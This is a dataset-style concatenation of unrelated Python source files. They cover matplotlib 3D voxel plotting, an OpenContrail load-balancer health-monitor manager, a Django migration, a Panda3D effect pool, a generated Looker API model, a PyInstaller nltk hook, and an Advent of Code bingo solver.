- A 4D ndarray of rgb/rgba data, with the components along the
last axis.
**kwargs
Additional keyword arguments to pass onto
:func:`~mpl_toolkits.mplot3d.art3d.Poly3DCollection`
Returns
-------
faces : dict
A dictionary indexed by coordinate, where ``faces[i,j,k]`` is a
`Poly3DCollection` of the faces drawn for the voxel
``filled[i,j,k]``. If no faces were drawn for a given voxel, either
because it was not asked to be drawn, or it is fully occluded, then
``(i,j,k) not in faces``.
Examples
--------
.. plot:: gallery/mplot3d/voxels.py
.. plot:: gallery/mplot3d/voxels_rgb.py
.. plot:: gallery/mplot3d/voxels_torus.py
.. plot:: gallery/mplot3d/voxels_numpy_logo.py
"""
# work out which signature we should be using, and use it to parse
# the arguments. Name must be voxels for the correct error message
if len(args) >= 3:
# underscores indicate position only
def voxels(__x, __y, __z, filled, **kwargs):
return (__x, __y, __z), filled, kwargs
else:
def voxels(filled, **kwargs):
return None, filled, kwargs
xyz, filled, kwargs = voxels(*args, **kwargs)
# check dimensions
if filled.ndim != 3:
raise ValueError("Argument filled must be 3-dimensional")
size = np.array(filled.shape, dtype=np.intp)
# check xyz coordinates, which are one larger than the filled shape
coord_shape = tuple(size + 1)
if xyz is None:
x, y, z = np.indices(coord_shape)
else:
x, y, z = (np.broadcast_to(c, coord_shape) for c in xyz)
def _broadcast_color_arg(color, name):
if np.ndim(color) in (0, 1):
# single color, like "red" or [1, 0, 0]
return np.broadcast_to(color, filled.shape + np.shape(color))
elif np.ndim(color) in (3, 4):
# 3D array of strings, or 4D array with last axis rgb
if np.shape(color)[:3] != filled.shape:
raise ValueError(
"When multidimensional, {} must match the shape of "
"filled".format(name))
return color
else:
raise ValueError("Invalid {} argument".format(name))
# broadcast and default on facecolors
if facecolors is None:
facecolors = self._get_patches_for_fill.get_next_color()
facecolors = _broadcast_color_arg(facecolors, 'facecolors')
# broadcast but no default on edgecolors
edgecolors = _broadcast_color_arg(edgecolors, 'edgecolors')
# always scale to the full array, even if the data is only in the center
self.auto_scale_xyz(x, y, z)
# points lying on corners of a square
square = np.array([
[0, 0, 0],
[0, 1, 0],
[1, 1, 0],
[1, 0, 0]
], dtype=np.intp)
voxel_faces = defaultdict(list)
def permutation_matrices(n):
""" Generator of cyclic permutation matices """
mat = np.eye(n, dtype=np.intp)
for i in range(n):
yield mat
mat = np.roll(mat, 1, axis=0)
# iterate over each of the YZ, ZX, and XY orientations, finding faces to
# render
for permute in permutation_matrices(3):
# find the set of ranges to iterate over
pc, qc, rc = permute.T.dot(size)
pinds = np.arange(pc)
qinds = np.arange(qc)
rinds = np.arange(rc)
square_rot = square.dot(permute.T)
# iterate within the current plane
for p in pinds:
for q in qinds:
# iterate perpendicularly to the current plane, handling
# boundaries. We only draw faces between a voxel and an
# empty space, to avoid drawing internal faces.
# draw lower faces
p0 = permute.dot([p, q, 0])
i0 = tuple(p0)
if filled[i0]:
voxel_faces[i0].append(p0 + square_rot)
# draw middle faces
for r1, r2 in zip(rinds[:-1], rinds[1:]):
p1 = permute.dot([p, q, r1])
p2 = permute.dot([p, q, r2])
i1 = tuple(p1)
i2 = tuple(p2)
if filled[i1] and not filled[i2]:
voxel_faces[i1].append(p2 + square_rot)
elif not filled[i1] and filled[i2]:
voxel_faces[i2].append(p2 + square_rot)
# draw upper faces
pk = permute.dot([p, q, rc-1])
pk2 = permute.dot([p, q, rc])
ik = tuple(pk)
if filled[ik]:
voxel_faces[ik].append(pk2 + square_rot)
# iterate over the faces, and generate a Poly3DCollection for each voxel
polygons = {}
for coord, faces_inds in voxel_faces.items():
# convert indices into 3D positions
if xyz is None:
faces = faces_inds
else:
faces = []
for face_inds in faces_inds:
ind = face_inds[:, 0], face_inds[:, 1], face_inds[:, 2]
face = np.empty(face_inds.shape)
face[:, 0] = x[ind]
face[:, 1] = y[ind]
face[:, 2] = z[ind]
faces.append(face)
poly = art3d.Poly3DCollection(faces,
facecolors=facecolors[coord],
edgecolors=edgecolors[coord],
**kwargs
)
self.add_collection3d(poly)
polygons[coord] = poly
return polygons
def get_test_data(delta=0.05):
'''
Return a tuple X, Y, Z with a test data set.
'''
x = y = np.arange(-3.0, 3.0, delta)
X, Y = np.meshgrid(x, y)
Z1 = np.exp(-(X**2 + Y**2) / 2) / (2 * np.pi)
Z2 = (np.exp(-(((X - 1) / 1.5)**2 + ((Y - 1) / 0.5)**2) / 2) /
(2 * np.pi * 0.5 * 1.5))
Z = Z2 - Z1
X = X * 10
Y = Y * 10
Z = Z * 500
return X, Y, Z
########################################################
# Register Axes3D as a 'projection' object available
# for use just like any other axes
########################################################
import matplotlib.projections as proj
proj.projection_registry.register(Axes3D)
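# ---------------------------------------------------------------------------
# Illustrative usage sketch (editorial addition, not part of the original
# module): a minimal, hedged demonstration of a few of the plotting methods
# defined above, written against the public matplotlib API.  It assumes an
# installed matplotlib with the mplot3d toolkit and only shows the documented
# call signatures, not every option.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    import numpy as np
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import axes3d  # registers the '3d' projection

    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')

    # bar3d: anchor points plus per-bar width, depth and height
    xpos = ypos = np.arange(4)
    ax.bar3d(xpos, ypos, np.zeros_like(xpos), dx=0.5, dy=0.5, dz=xpos + 1)

    # quiver: six positional arrays X, Y, Z, U, V, W
    ax.quiver([0], [0], [4], [1], [1], [1], length=2.0, normalize=True)

    # scatter with explicit z values and depth shading
    ax.scatter([0, 1, 2], [0, 1, 2], zs=[1, 2, 4], depthshade=True)

    # contour of the module's own test data, extended into 3D bands
    X, Y, Z = axes3d.get_test_data(0.1)
    fig2 = plt.figure()
    ax2 = fig2.add_subplot(111, projection='3d')
    ax2.contour(X, Y, Z, extend3d=True)

    plt.show()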
| 35.694012
| 85
| 0.538741
|
82639ab55b46aae0472e4b4bf095975a5f0e1c0a
| 4,312
|
py
|
Python
|
neutron_plugin_contrail/plugins/opencontrail/loadbalancer/loadbalancer_healthmonitor.py
|
Mirantis/contrail-neutron-plugin
|
1ece1257973d4abcc31a351faad616cffaf631cd
|
[
"Apache-2.0"
] | null | null | null |
neutron_plugin_contrail/plugins/opencontrail/loadbalancer/loadbalancer_healthmonitor.py
|
Mirantis/contrail-neutron-plugin
|
1ece1257973d4abcc31a351faad616cffaf631cd
|
[
"Apache-2.0"
] | null | null | null |
neutron_plugin_contrail/plugins/opencontrail/loadbalancer/loadbalancer_healthmonitor.py
|
Mirantis/contrail-neutron-plugin
|
1ece1257973d4abcc31a351faad616cffaf631cd
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2014 Juniper Networks, Inc. All rights reserved.
#
import uuid
try:
from neutron.extensions import loadbalancer
except ImportError:
from neutron_lbaas.extensions import loadbalancer
try:
from neutron.openstack.common import uuidutils
except ImportError:
from oslo_utils import uuidutils
from vnc_api.vnc_api import IdPermsType
from vnc_api.vnc_api import LoadbalancerHealthmonitor
from vnc_api.vnc_api import LoadbalancerHealthmonitorType
from resource_manager import ResourceManager
class LoadbalancerHealthmonitorManager(ResourceManager):
_loadbalancer_health_type_mapping = {
'admin_state': 'admin_state_up',
'monitor_type': 'type',
'delay': 'delay',
'timeout': 'timeout',
'max_retries': 'max_retries',
'http_method': 'http_method',
'url_path': 'url_path',
'expected_codes': 'expected_codes'
}
@property
def property_type_mapping(self):
return self._loadbalancer_health_type_mapping
def make_properties(self, health_monitor):
props = LoadbalancerHealthmonitorType()
for key, mapping in self._loadbalancer_health_type_mapping.iteritems():
if mapping in health_monitor:
setattr(props, key, health_monitor[mapping])
return props
def make_dict(self, health_monitor, fields=None):
res = {'id': health_monitor.uuid,
'tenant_id': health_monitor.parent_uuid.replace('-', ''),
'status': self._get_object_status(health_monitor)}
props = health_monitor.get_loadbalancer_healthmonitor_properties()
monitor_type = getattr(props, 'monitor_type')
for key, mapping in self._loadbalancer_health_type_mapping.iteritems():
value = getattr(props, key)
if value is not None:
if monitor_type not in ('HTTP', 'HTTPS'):
if mapping in ('http_method', 'url_path', 'expected_codes'):
continue
res[mapping] = value
pool_ids = []
pool_back_refs = health_monitor.get_loadbalancer_pool_back_refs()
for pool_back_ref in pool_back_refs or []:
pool_id = {}
pool_id['pool_id'] = pool_back_ref['uuid']
pool_ids.append(pool_id)
res['pools'] = pool_ids
return self._fields(res, fields)
def resource_read(self, id):
return self._api.loadbalancer_healthmonitor_read(id=id)
def resource_list(self, tenant_id=None):
if tenant_id:
parent_id = str(uuid.UUID(tenant_id))
else:
parent_id = None
return self._api.loadbalancer_healthmonitors_list(parent_id=parent_id)
def resource_update(self, obj):
return self._api.loadbalancer_healthmonitor_update(obj)
def resource_delete(self, id):
return self._api.loadbalancer_healthmonitor_delete(id=id)
def get_exception_notfound(self, id=None):
return loadbalancer.HealthMonitorNotFound(monitor_id=id)
def get_exception_inuse(self, id=None):
return loadbalancer.HealthMonitorInUse(monitor_id=id)
@property
def neutron_name(self):
return "health_monitor"
@property
def resource_name_plural(self):
return "loadbalancer-healthmonitors"
def create(self, context, health_monitor):
"""
        Create a loadbalancer_healthmonitor object.
"""
m = health_monitor['health_monitor']
tenant_id = self._get_tenant_id_for_create(context, m)
project = self._project_read(project_id=tenant_id)
uuid = uuidutils.generate_uuid()
props = self.make_properties(m)
id_perms = IdPermsType(enable=True)
monitor_db = LoadbalancerHealthmonitor(
uuid, project, loadbalancer_healthmonitor_properties=props,
id_perms=id_perms)
monitor_db.uuid = uuid
self._api.loadbalancer_healthmonitor_create(monitor_db)
return self.make_dict(monitor_db)
def update_properties(self, monitor_db, id, m):
props = monitor_db.get_loadbalancer_healthmonitor_properties()
if self.update_properties_subr(props, m):
monitor_db.set_loadbalancer_healthmonitor_properties(props)
return True
return False
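# ---------------------------------------------------------------------------
# Illustrative sketch (editorial addition, not part of the original module):
# how the _loadbalancer_health_type_mapping table above translates a
# Neutron-style health_monitor dict into per-attribute properties.  The
# SimpleProps stand-in and the sample dict below are hypothetical; the real
# manager sets attributes on vnc_api's LoadbalancerHealthmonitorType.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    class SimpleProps(object):
        """Hypothetical stand-in for LoadbalancerHealthmonitorType."""
        pass

    mapping = {
        'admin_state': 'admin_state_up',
        'monitor_type': 'type',
        'delay': 'delay',
        'timeout': 'timeout',
        'max_retries': 'max_retries',
    }
    neutron_monitor = {'admin_state_up': True, 'type': 'PING',
                       'delay': 5, 'timeout': 3, 'max_retries': 2}

    props = SimpleProps()
    for key, neutron_key in mapping.items():
        if neutron_key in neutron_monitor:
            setattr(props, key, neutron_monitor[neutron_key])

    print("%s %s" % (props.monitor_type, props.delay))  # -> PING 5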
| 33.952756
| 80
| 0.676716
|
400a70e526d585cca03c0147f2c30a990341b335
| 418
|
py
|
Python
|
incident_reports/migrations/0002_auto_20200930_1648.py
|
adarshtri/art-dashboard-server
|
c6c61147d49aa43b6e2892ce07d8a115c1478b0c
|
[
"Apache-2.0"
] | 1
|
2020-09-21T06:48:47.000Z
|
2020-09-21T06:48:47.000Z
|
incident_reports/migrations/0002_auto_20200930_1648.py
|
adarshtri/art-dashboard-server
|
c6c61147d49aa43b6e2892ce07d8a115c1478b0c
|
[
"Apache-2.0"
] | 5
|
2021-02-05T19:43:08.000Z
|
2021-06-04T23:23:29.000Z
|
incident_reports/migrations/0002_auto_20200930_1648.py
|
adarshtri/art-dashboard-server
|
c6c61147d49aa43b6e2892ce07d8a115c1478b0c
|
[
"Apache-2.0"
] | 6
|
2021-02-06T07:21:37.000Z
|
2021-06-07T12:40:37.000Z
|
# Generated by Django 3.0.7 on 2020-09-30 16:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('incident_reports', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='incident',
name='incident_end',
field=models.DateTimeField(blank=True, default=None, null=True),
),
]
| 22
| 76
| 0.614833
|
98890b8a24a47b0fd2c429f1ebb00d649e76c145
| 1,566
|
py
|
Python
|
pirates/effects/PooledEffect.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/effects/PooledEffect.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/effects/PooledEffect.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import *
from direct.showbase import Pool
from direct.showbase.DirectObject import DirectObject
import re
class PooledEffect(DirectObject, NodePath):
GlobalCount = 0
GlobalLimit = 200
pool = None
poolLimit = 30
@classmethod
def getEffect(cls, unlimited=False, context=''):
if cls.pool is None:
cls.pool = Pool.Pool()
if unlimited or PooledEffect.GlobalCount < PooledEffect.GlobalLimit:
if cls.pool.hasFree():
PooledEffect.GlobalCount += 1
return cls.pool.checkout()
else:
free, used = cls.pool.getNumItems()
if free + used < cls.poolLimit:
PooledEffect.GlobalCount += 1
cls.pool.add(cls())
return cls.pool.checkout()
return
@classmethod
def checkInEffect(cls, item):
if cls.pool and cls.pool.isUsed(item):
PooledEffect.GlobalCount -= 1
cls.pool.checkin(item)
@classmethod
def cleanup(cls):
if cls.pool:
cls.pool.cleanup(cls.destroy)
cls.pool = None
return
@classmethod
def setGlobalLimit(cls, limit):
PooledEffect.GlobalLimit = limit
def __init__(self):
NodePath.__init__(self, self.__class__.__name__)
self.accept('clientLogout', self.__class__.cleanup)
def destroy(self, item=None):
if item:
self.pool.remove(item)
self.ignore('clientLogout')
self.removeNode()
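# ---------------------------------------------------------------------------
# Illustrative sketch (editorial addition, not part of the original module):
# the checkout / check-in pattern PooledEffect builds on, shown with a
# hypothetical plain-Python pool so the idea can be followed without Panda3D.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    class TinyPool(object):
        """Hypothetical stand-in for direct.showbase.Pool.Pool."""

        def __init__(self):
            self.free = []
            self.used = []

        def hasFree(self):
            return bool(self.free)

        def add(self, item):
            self.free.append(item)

        def checkout(self):
            item = self.free.pop()
            self.used.append(item)
            return item

        def checkin(self, item):
            self.used.remove(item)
            self.free.append(item)

    pool = TinyPool()
    pool.add('effect-1')                 # like cls.pool.add(cls())
    effect = pool.checkout()             # like PooledEffect.getEffect()
    pool.checkin(effect)                 # like PooledEffect.checkInEffect()
    print("%r %r" % (pool.free, pool.used))  # -> ['effect-1'] []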
| 29.54717
| 76
| 0.59387
|
b61a573d33b65428338a45722eb22a76500df1bb
| 9,949
|
py
|
Python
|
lookerapi/models/dialect_info.py
|
llooker/python_sdk
|
8364839b1de0519771f2f749e45b4e6cb1c75577
|
[
"MIT"
] | 12
|
2019-05-17T11:50:45.000Z
|
2021-11-11T21:37:05.000Z
|
lookerapi/models/dialect_info.py
|
meetup/lookerapi
|
4e4160dbe007eb65ac8f449bead0cdc06090b07b
|
[
"MIT"
] | 4
|
2019-06-19T20:13:14.000Z
|
2020-10-13T21:13:47.000Z
|
lookerapi/models/dialect_info.py
|
meetup/lookerapi
|
4e4160dbe007eb65ac8f449bead0cdc06090b07b
|
[
"MIT"
] | 10
|
2018-10-10T20:45:00.000Z
|
2022-02-21T03:12:58.000Z
|
# coding: utf-8
"""
Looker API 3.0 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning. Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning)
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class DialectInfo(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, name=None, label=None, label_for_database_equivalent=None, default_port=None, default_max_connections=None, supported_options=None, installed=None, can=None):
"""
DialectInfo - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'name': 'str',
'label': 'str',
'label_for_database_equivalent': 'str',
'default_port': 'str',
'default_max_connections': 'str',
'supported_options': 'DialectInfoOptions',
'installed': 'bool',
'can': 'dict(str, bool)'
}
self.attribute_map = {
'name': 'name',
'label': 'label',
'label_for_database_equivalent': 'label_for_database_equivalent',
'default_port': 'default_port',
'default_max_connections': 'default_max_connections',
'supported_options': 'supported_options',
'installed': 'installed',
'can': 'can'
}
self._name = name
self._label = label
self._label_for_database_equivalent = label_for_database_equivalent
self._default_port = default_port
self._default_max_connections = default_max_connections
self._supported_options = supported_options
self._installed = installed
self._can = can
@property
def name(self):
"""
Gets the name of this DialectInfo.
The name of the dialect
:return: The name of this DialectInfo.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this DialectInfo.
The name of the dialect
:param name: The name of this DialectInfo.
:type: str
"""
self._name = name
@property
def label(self):
"""
Gets the label of this DialectInfo.
The human-readable label of the connection
:return: The label of this DialectInfo.
:rtype: str
"""
return self._label
@label.setter
def label(self, label):
"""
Sets the label of this DialectInfo.
The human-readable label of the connection
:param label: The label of this DialectInfo.
:type: str
"""
self._label = label
@property
def label_for_database_equivalent(self):
"""
Gets the label_for_database_equivalent of this DialectInfo.
What the dialect calls the equivalent of a normal SQL table
:return: The label_for_database_equivalent of this DialectInfo.
:rtype: str
"""
return self._label_for_database_equivalent
@label_for_database_equivalent.setter
def label_for_database_equivalent(self, label_for_database_equivalent):
"""
Sets the label_for_database_equivalent of this DialectInfo.
What the dialect calls the equivalent of a normal SQL table
:param label_for_database_equivalent: The label_for_database_equivalent of this DialectInfo.
:type: str
"""
self._label_for_database_equivalent = label_for_database_equivalent
@property
def default_port(self):
"""
Gets the default_port of this DialectInfo.
Default port number
:return: The default_port of this DialectInfo.
:rtype: str
"""
return self._default_port
@default_port.setter
def default_port(self, default_port):
"""
Sets the default_port of this DialectInfo.
Default port number
:param default_port: The default_port of this DialectInfo.
:type: str
"""
self._default_port = default_port
@property
def default_max_connections(self):
"""
Gets the default_max_connections of this DialectInfo.
        Default maximum number of connections
:return: The default_max_connections of this DialectInfo.
:rtype: str
"""
return self._default_max_connections
@default_max_connections.setter
def default_max_connections(self, default_max_connections):
"""
Sets the default_max_connections of this DialectInfo.
        Default maximum number of connections
:param default_max_connections: The default_max_connections of this DialectInfo.
:type: str
"""
self._default_max_connections = default_max_connections
@property
def supported_options(self):
"""
Gets the supported_options of this DialectInfo.
Option support details
:return: The supported_options of this DialectInfo.
:rtype: DialectInfoOptions
"""
return self._supported_options
@supported_options.setter
def supported_options(self, supported_options):
"""
Sets the supported_options of this DialectInfo.
Option support details
:param supported_options: The supported_options of this DialectInfo.
:type: DialectInfoOptions
"""
self._supported_options = supported_options
@property
def installed(self):
"""
Gets the installed of this DialectInfo.
Is the supporting driver installed
:return: The installed of this DialectInfo.
:rtype: bool
"""
return self._installed
@installed.setter
def installed(self, installed):
"""
Sets the installed of this DialectInfo.
Is the supporting driver installed
:param installed: The installed of this DialectInfo.
:type: bool
"""
self._installed = installed
@property
def can(self):
"""
Gets the can of this DialectInfo.
Operations the current user is able to perform on this object
:return: The can of this DialectInfo.
:rtype: dict(str, bool)
"""
return self._can
@can.setter
def can(self, can):
"""
Sets the can of this DialectInfo.
Operations the current user is able to perform on this object
:param can: The can of this DialectInfo.
:type: dict(str, bool)
"""
self._can = can
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, DialectInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
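# ---------------------------------------------------------------------------
# Illustrative sketch (editorial addition, not part of the generated module):
# constructing a DialectInfo and round-tripping it through to_dict()/to_str().
# The field values are made up purely for demonstration.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    info = DialectInfo(name='mysql', label='MySQL',
                       default_port='3306', installed=True)
    # to_dict() walks swagger_types and returns plain Python values,
    # leaving unset attributes (e.g. supported_options) as None.
    print(info.to_str())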
| 33.163333
| 1,625
| 0.625691
|
53cf978cb7e5f7e8399767ed86407565f9b1c692
| 797
|
py
|
Python
|
hooks/hook-nltk.py
|
moevm/nosql1h19-text-graph
|
410f156ad4f232f8aa060d43692ab020610ddfd4
|
[
"MIT"
] | null | null | null |
hooks/hook-nltk.py
|
moevm/nosql1h19-text-graph
|
410f156ad4f232f8aa060d43692ab020610ddfd4
|
[
"MIT"
] | null | null | null |
hooks/hook-nltk.py
|
moevm/nosql1h19-text-graph
|
410f156ad4f232f8aa060d43692ab020610ddfd4
|
[
"MIT"
] | null | null | null |
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2018, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
# hook for nltk
import nltk
import os
from PyInstaller.utils.hooks import collect_data_files
# add datas for nltk
datas = collect_data_files('nltk', False)
# loop through the data directories and add them
for p in nltk.data.path:
if os.path.exists(p):
datas.append((p, "nltk_data"))
# nltk.chunk.named_entity should be included
hiddenimports = ["nltk.chunk.named_entity"]
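# ---------------------------------------------------------------------------
# Illustrative note (editorial addition, not part of the original hook): each
# entry appended above is a (source_path, destination_folder) tuple that
# PyInstaller copies into the bundle.  Running the hook file directly is
# purely hypothetical (hooks are normally only imported by PyInstaller), but
# would list what was collected.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    for source_path, destination in datas:
        print("%s -> %s" % (source_path, destination))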
| 30.653846
| 78
| 0.608532
|
fb5087e2f5125f07a505f937d41644613b158308
| 1,965
|
py
|
Python
|
day4/d4p1.py
|
flowgrow/adventofcode2021
|
b6e316a388726031ff500ce77d1ec5d5b7da0658
|
[
"MIT"
] | null | null | null |
day4/d4p1.py
|
flowgrow/adventofcode2021
|
b6e316a388726031ff500ce77d1ec5d5b7da0658
|
[
"MIT"
] | null | null | null |
day4/d4p1.py
|
flowgrow/adventofcode2021
|
b6e316a388726031ff500ce77d1ec5d5b7da0658
|
[
"MIT"
] | null | null | null |
draws = []
boards = []
markings = []
def find_number(matrix, number):
for r in range(5):
for c in range(5):
            if matrix[r][c] == number:
return (True, r, c)
return (False, -1, -1)
def find_bingo(marking, board):
for r, row in enumerate(marking):
if sum(row) == 5:
return True
transposed = list(map(list, zip(*marking)))
for c, col in enumerate(transposed):
if sum(col) == 5:
return True
return False
def sum_unmarked(marking, board):
sum = 0
for r in range(5):
for c in range(5):
if marking[r][c] == 0:
sum += board[r][c]
return sum
def sum_marked(marking, board):
sum = 0
for r in range(5):
for c in range(5):
if marking[r][c] == 1:
sum += board[r][c]
return sum
def read_data():
global draws
global boards
global markings
input = open('input.txt', 'r')
draws = input.readline().strip()
draws = [int(x) for x in draws.split(',')]
lines = input.readlines()
row = 0
for line in lines:
line = line.strip()
if len(line) == 0:
boards.append([None] * 5)
markings.append([None] * 5)
row = 0
else:
numbers = [int(x) for x in line.split()]
boards[-1][row] = numbers
markings[-1][row] = [0, 0, 0, 0, 0]
row += 1
def play_game():
for i, number in enumerate(draws):
for j, board in enumerate(boards):
marking = markings[j]
found, r, c = find_number(board, number)
if found:
marking[r][c] = 1
if i >= 5:
bingo = find_bingo(marking, board)
if bingo:
return sum_unmarked(marking, board), number
return 0, 0
read_data()
sum, number = play_game()
print(sum, number, sum * number)
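# ---------------------------------------------------------------------------
# Illustrative self-check (editorial addition, not part of the original
# solution): find_bingo should only report a win once a full row or column of
# the 5x5 marking matrix is set, and sum_unmarked should skip the marked row.
# ---------------------------------------------------------------------------
demo_board = [[c + 5 * r for c in range(5)] for r in range(5)]
demo_marking = [[0] * 5 for _ in range(5)]
assert not find_bingo(demo_marking, demo_board)
demo_marking[2] = [1, 1, 1, 1, 1]        # complete the third row
assert find_bingo(demo_marking, demo_board)
assert sum_unmarked(demo_marking, demo_board) == sum(range(25)) - sum(demo_board[2])
print('find_bingo self-check passed')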
| 23.674699
| 67
| 0.499237
|
e783cf60d79f7ebed1128430f6892b74fae05a74
| 3,262
|
py
|
Python
|
contextmonkey/tracelayer/handlers/model/ModelRequestHandler.py
|
manojrege/contextmonkey
|
9974889a726d7f60c6da0d6ccab97113ce635a14
|
[
"BSD-3-Clause"
] | 4
|
2017-03-17T02:28:12.000Z
|
2019-04-18T11:25:44.000Z
|
contextmonkey/tracelayer/handlers/model/ModelRequestHandler.py
|
manojrege/contextmonkey
|
9974889a726d7f60c6da0d6ccab97113ce635a14
|
[
"BSD-3-Clause"
] | null | null | null |
contextmonkey/tracelayer/handlers/model/ModelRequestHandler.py
|
manojrege/contextmonkey
|
9974889a726d7f60c6da0d6ccab97113ce635a14
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Technische Universität Berlin
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# - Neither the name of the Technische Universitaet Berlin nor the names
# of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Model trace fetching request handler."""
__author__ = "Manoj R. Rege"
__copyright__ = "Copyright (c) 2017, Technische Universität Berlin"
__credits__ = ["Manoj R. Rege"]
__version__ = "1.0"
__maintainer__ = "Manoj R. Rege"
__email__ = "rege@tkn.tu-berlin.de"
__status__ = "Prototype"
import sys
import os
sys.path.append(os.path.dirname(__file__) + '/../../../' )
import linecache
import random
import requests
from subprocess import call
from collections import namedtuple
from twisted.internet import reactor
from twisted.web.client import downloadPage
from twisted.python.util import println
from twisted.internet.ssl import ClientContextFactory
from twisted.internet import ssl
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import TEXTFileCache
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import CSVFileCache
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import YAMLFileCache
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import JSONFileCache
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import XMLFileCache
class ModelRequestHandler(object):
"""Base class to handle trace fetching request from a model."""
def __init__(self,**kwargs):
"""Initialize model handler."""
pass
def failure(self, reason):
"""Handle trace fetching failure."""
pass
def executeFetch(self, **kwargs):
"""Read trace from a trace file in the cache."""
pass
def generateScenario(self, **kwargs):
"""Generate trace file from a given scenario using the command."""
pass
| 41.291139
| 87
| 0.770999
|
167cfbbcbe47cc2d4e0286fbe3964defdde43202
| 170
|
py
|
Python
|
src/cross_validation/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | 1
|
2021-08-19T14:28:45.000Z
|
2021-08-19T14:28:45.000Z
|
src/cross_validation/__init__.py
|
